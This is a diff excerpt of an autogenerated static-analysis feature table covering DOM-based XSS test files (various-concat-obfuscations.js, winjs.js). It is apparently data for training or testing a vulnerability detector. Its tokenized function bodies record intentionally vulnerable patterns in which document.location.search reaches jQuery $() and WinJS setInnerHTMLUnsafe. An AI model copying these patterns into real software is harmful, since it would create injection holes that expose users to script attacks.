    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:2:20:48 | exceptional return of $(indir ... attrs)) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:2:20:48 | exceptional return of $(indir ... attrs)) | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:4:20:15 | indirection1 | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:4:20:15 | indirection1 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:4:20:15 | indirection1 | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:4:20:15 | indirection1 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:4:20:15 | indirection1 | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:4:20:47 | exceptional return of indirec ... .attrs) | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:4:20:47 | exceptional return of indirec ... .attrs) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:4:20:47 | exceptional return of indirec ... .attrs) | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:4:20:47 | exceptional return of indirec ... .attrs) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:4:20:47 | exceptional return of indirec ... .attrs) | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | @@ -18491,6 +125939,68 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:17:20:24 | document | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:17:20:24 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:17:20:24 | document | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:17:20:24 | document | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:17:20:24 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:17:20:33 | document.location | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:17:20:33 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:17:20:33 | document.location | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:17:20:33 | document.location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:17:20:33 | document.location | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:17:20:40 | documen ... .search | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:17:20:40 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:17:20:40 | documen ... .search | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:17:20:40 | documen ... .search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:17:20:40 | documen ... .search | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | CalleeFlexibleAccessPath | indirection1 | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:26:20:33 | location | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:26:20:33 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:26:20:33 | location | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:26:20:33 | location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:26:20:33 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:35:20:40 | search | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:35:20:40 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:35:20:40 | search | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:35:20:40 | search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:35:20:40 | search | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:42:20:46 | attrs | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:42:20:46 | attrs | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:42:20:46 | attrs | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:42:20:46 | attrs | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:42:20:46 | attrs | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:2:21:2 | $ | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:2:21:2 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:2:21:2 | $ | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:2:21:2 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:2:21:2 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:2:21:48 | $(indir ... attrs)) | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:2:21:48 | $(indir ... attrs)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:2:21:48 | $(indir ... attrs)) | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:2:21:48 | $(indir ... attrs)) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:2:21:48 | $(indir ... attrs)) | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:2:21:48 | exceptional return of $(indir ... attrs)) | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:2:21:48 | exceptional return of $(indir ... attrs)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:2:21:48 | exceptional return of $(indir ... attrs)) | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:2:21:48 | exceptional return of $(indir ... attrs)) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:2:21:48 | exceptional return of $(indir ... attrs)) | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:4:21:15 | indirection2 | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:4:21:15 | indirection2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:4:21:15 | indirection2 | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:4:21:15 | indirection2 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:4:21:15 | indirection2 | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:4:21:47 | exceptional return of indirec ... .attrs) | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:4:21:47 | exceptional return of indirec ... .attrs) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:4:21:47 | exceptional return of indirec ... .attrs) | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:4:21:47 | exceptional return of indirec ... .attrs) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:4:21:47 | exceptional return of indirec ... .attrs) | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | @@ -18498,6 +126008,142 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:17:21:24 | document | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:17:21:24 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:17:21:24 | document | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:17:21:24 | document | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:17:21:24 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:17:21:33 | document.location | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:17:21:33 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:17:21:33 | document.location | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:17:21:33 | document.location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:17:21:33 | document.location | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:17:21:40 | documen ... .search | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:17:21:40 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:17:21:40 | documen ... .search | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:17:21:40 | documen ... .search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:17:21:40 | documen ... .search | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | CalleeFlexibleAccessPath | indirection2 | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:26:21:33 | location | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:26:21:33 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:26:21:33 | location | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:26:21:33 | location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:26:21:33 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:35:21:40 | search | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:35:21:40 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:35:21:40 | search | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:35:21:40 | search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:35:21:40 | search | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:42:21:46 | attrs | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:42:21:46 | attrs | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:42:21:46 | attrs | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:42:21:46 | attrs | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:21:42:21:46 | attrs | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:1:0 | this | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:1:0 | this | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:1:0 | this | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:1:0 | this | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:5:1 | 'arguments' object of function test | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:5:1 | 'arguments' object of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:5:1 | 'arguments' object of function test | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:5:1 | 'arguments' object of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:5:1 | 'arguments' object of function test | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:5:1 | exceptional return of function test | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:5:1 | exceptional return of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:5:1 | exceptional return of function test | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:5:1 | exceptional return of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:5:1 | exceptional return of function test | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:5:1 | functio ... ted);\\n} | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:5:1 | functio ... ted);\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:5:1 | functio ... ted);\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:5:1 | return of function test | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:5:1 | return of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:5:1 | return of function test | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:5:1 | return of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:1:1:5:1 | return of function test | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:1:10:1:13 | test | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:1:10:1:13 | test | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:1:10:1:13 | test | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:1:15:1:17 | elt | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:1:15:1:17 | elt | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:1:15:1:17 | elt | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/winjs.js:1:15:1:17 | elt | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:1:15:1:17 | elt | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:1:15:1:17 | elt | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:1:15:1:17 | elt | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:1:15:1:17 | elt | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:1:15:1:17 | elt | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:1:15:1:17 | elt | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:2:7:2:13 | tainted | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:2:7:2:13 | tainted | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:2:7:2:13 | tainted | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:2:7:2:13 | tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:2:7:2:13 | tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:2:7:2:53 | tainted | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:2:7:2:53 | tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/winjs.js:2:7:2:53 | tainted | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:2:7:2:53 | tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:2:7:2:53 | tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:2:7:2:53 | tainted ... ring(1) | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:2:7:2:53 | tainted ... ring(1) | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:2:7:2:53 | tainted ... ring(1) | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:2:7:2:53 | tainted ... ring(1) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:2:7:2:53 | tainted ... ring(1) | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:24 | document | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:24 | document | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:24 | document | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:24 | document | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:24 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:33 | document.location | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:33 | document.location | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:33 | document.location | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:33 | document.location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:33 | document.location | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:40 | documen ... .search | contextFunctionInterfaces | test(elt) | +| 